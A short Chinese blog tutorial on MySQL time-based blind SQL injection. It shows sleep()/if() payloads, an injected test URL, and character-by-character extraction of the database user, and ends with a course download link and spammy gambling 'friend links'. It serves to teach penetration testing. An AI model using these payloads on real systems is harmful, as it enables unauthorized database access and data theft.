Jan 20 2018

【原创】(PHP+MYSQL(延时注入和注入工具编写)

首页 » 原创作品 » 【原创】(PHP+MYSQL(延时注入和注入工具编写)   

【原创】(PHP+MYSQL(延时注入和注入工具编写)

【原创】(PHP+MYSQL(延时注入和注入工具编写)


这是以前培训录制的一个课程 现在分享出来给大家学习吧。


1.jpg


延时注入 等于时间差注入

 

延时注入往往用于难于判断页面 是否存在注入漏洞的检测方法。

 

延时注入的原理:在mysql中存在sleep函数,这个函数是主要让数据库查询的结果,等待多少秒返回给客户端,可以使用这个函数构造注入语句加以判断即可。

 

Sleep

select sleep(10)

 

if

select if('x'='y',1,0)

 

select if('x'='x',sleep(5),0)

 

判断是否存在注入

http://localhost/sql/sleep.php?id=1%20and%20sleep(10)

 

出数据

selectif(ascii(substring(user(),1,1))=114,sleep(5),0)

 

首先要判断这个字符串的长度select LENGTH(user()) 14

 

selectif(ascii(substring(user(),1,1))=114,sleep(5),0)

 

select if(ascii(substring(user(),2,1))=114,sleep(5),0)

 

payloads='abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'

 

判断第一个

 

root@localhost

 

就是延时注入得到数据的原理


教程下载


链接:https://pan.baidu.com/s/1smCSyXv 密码:h0fw


我的微信公众号 不定期更新一些渗透技巧和教程

qrcode_for_gh_ceb74c1acd23_258.jpg


如果您喜欢本博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容:

正文部分到此结束

文章标签:这篇文章木有标签

版权声明:若无特殊注明,本文皆为( mOon )原创,转载请保留文章出处。

也许喜欢: «【原创】AngelSword(天使之剑)漏洞框架的使用 | Burp1.7.26 永久版本»

你肿么看?

你还可以输入 250/250 个字

微笑 大笑 拽 大哭 亲亲 流汗 喷血 奸笑 囧 不爽 晕 示爱 害羞 吃惊 惊叹 爱你 吓死了 呵呵

评论信息框

这篇文章还没有收到评论,赶紧来抢沙发吧~

友情链接:万达娱乐主管  万达注册  万达主管  万达娱乐注册  万达主管QQ  万达娱乐直属QQ  万达娱乐开户  万达娱乐直属QQ  万达直属  万达娱乐招商